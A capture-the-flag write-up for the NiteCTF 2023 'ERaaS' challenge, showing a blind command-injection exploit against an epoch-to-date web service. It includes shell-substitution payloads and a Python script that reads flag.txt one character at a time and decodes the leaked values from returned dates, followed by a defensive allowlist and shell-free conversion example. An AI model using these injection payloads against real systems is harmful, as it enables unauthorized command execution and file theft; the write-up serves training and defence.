NiteCTF 2023: ERaaS
Context
We are given a link (http://eraas.web.nitectf.live/). This website sends us to a page where we can input a date as an epoch timestamp and it converts it to human readable form.
Writeup
This one is similar to CaaS as it is also a command injection vulnerability. As verified by this request:
This time, it's not as easy as before because no matter what I tried I couldn't find a way to print out something other than a date. I could guess a few things by looking at the return code of those commands. For instance, with this input 0$(ls flag.txt; echo $?)
I could find out that the flag is in the same dir as us.
So I went for a method that reads the n-th character of the flag, prints its ASCII code as the epoch value, and from the returned date we can recover the number and then the character.
So here's the script to extract the dates:
import requests

url = "http://eraas.web.nitectf.live/"
date_list = list()

for i in range(1, 70):
    # The n-th flag character's ASCII code, wrapped in "0...0", becomes an epoch value of code * 10
    data = {"user_input": f"0$(printf '%d\n' \"'$(cat flag.txt | cut -c{i})\")0"}
    r = requests.post(url, data=data)
    # The converted date sits inside a <code> tag on line 25 of the response HTML
    date = r.text.split("\n")[24].replace("<code>", "").replace("</code>", "").strip()
    date_list.append(date)

print(date_list)
And the script to convert the dates back into the flag characters:
from datetime import datetime
from calendar import timegm

# Dates returned by the server, one per flag character (list shown truncated here)
a = ['Thu Jan 1 00:18:20 UTC 1970', ... , 'Thu Jan 1 00:00:00 UTC 1970']
date_format = "%a %b %d %H:%M:%S UTC %Y"
res = ""

for i in range(len(a)):
    # Seconds since the epoch; the server received "0<code>0", i.e. the ASCII code times 10
    t = timegm(datetime.strptime(a[i], date_format).timetuple())
    print(hex(t // 10))
    res += chr(t // 10)

print(res)
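From the defender's side, the root cause is that the epoch value is spliced into a shell command line. The following Python is an added example, not the challenge's code, showing how the service could convert an epoch without ever reaching a shell: a strict digits-only allowlist, conversion with datetime instead of a subprocess, and, if the external date binary must be kept, an argv list in which the validated value is a single argument. The function names, the regex and the argv form are assumptions; the output format is the one the service returned in the writeup.

```python
import re
from datetime import datetime, timezone

# Same output format the ERaaS service returned in the writeup
DATE_FORMAT = "%a %b %d %H:%M:%S UTC %Y"

# Allowlist (assumed policy): an epoch timestamp is nothing but ASCII digits,
# optionally with a leading minus; ten digits keeps the year within datetime's range
EPOCH_RE = re.compile(r"^-?[0-9]{1,10}$")


def validate_epoch(user_input: str) -> int:
    """Return the integer epoch value, or raise ValueError for anything else.

    Inputs such as 0$(...)0 or 0$(ls flag.txt; echo $?) fail here, so they can
    never reach a command interpreter.
    """
    value = user_input.strip()
    if not EPOCH_RE.fullmatch(value):
        raise ValueError("epoch must be an integer")
    return int(value)


def epoch_to_date(user_input: str) -> str:
    """Convert a user-supplied epoch string to a date without touching a shell."""
    seconds = validate_epoch(user_input)
    return datetime.fromtimestamp(seconds, tz=timezone.utc).strftime(DATE_FORMAT)


def date_argv(user_input: str):
    """If the external `date` binary must be kept, build an argv list, not a shell string.

    The validated value travels as one argument, so $(...), ';' and '|' are never
    interpreted. Assumed usage: subprocess.run(date_argv(x), capture_output=True,
    text=True, check=True) with no shell=True.
    """
    seconds = validate_epoch(user_input)
    return ["date", "-u", "-d", f"@{seconds}"]


def is_rejected(user_input: str) -> bool:
    """True if the validator refuses the input (used for the checks below)."""
    try:
        validate_epoch(user_input)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample inputs: a legitimate timestamp and the writeup's probes
    print(epoch_to_date("1100"))
    print(is_rejected("0$(ls flag.txt; echo $?)"))
    print(is_rejected("0$(printf '%d\\n' \"'$(cat flag.txt | cut -c1)\")0"))
    print(date_argv(" 1100 "))
```

The allowlist matters more than any escaping: once the value is proven to be an integer there is nothing left for a shell to interpret, and the datetime path removes the subprocess entirely. Note that the service's own output used the two-space padded day that GNU date prints, whereas strftime's %d zero-pads it.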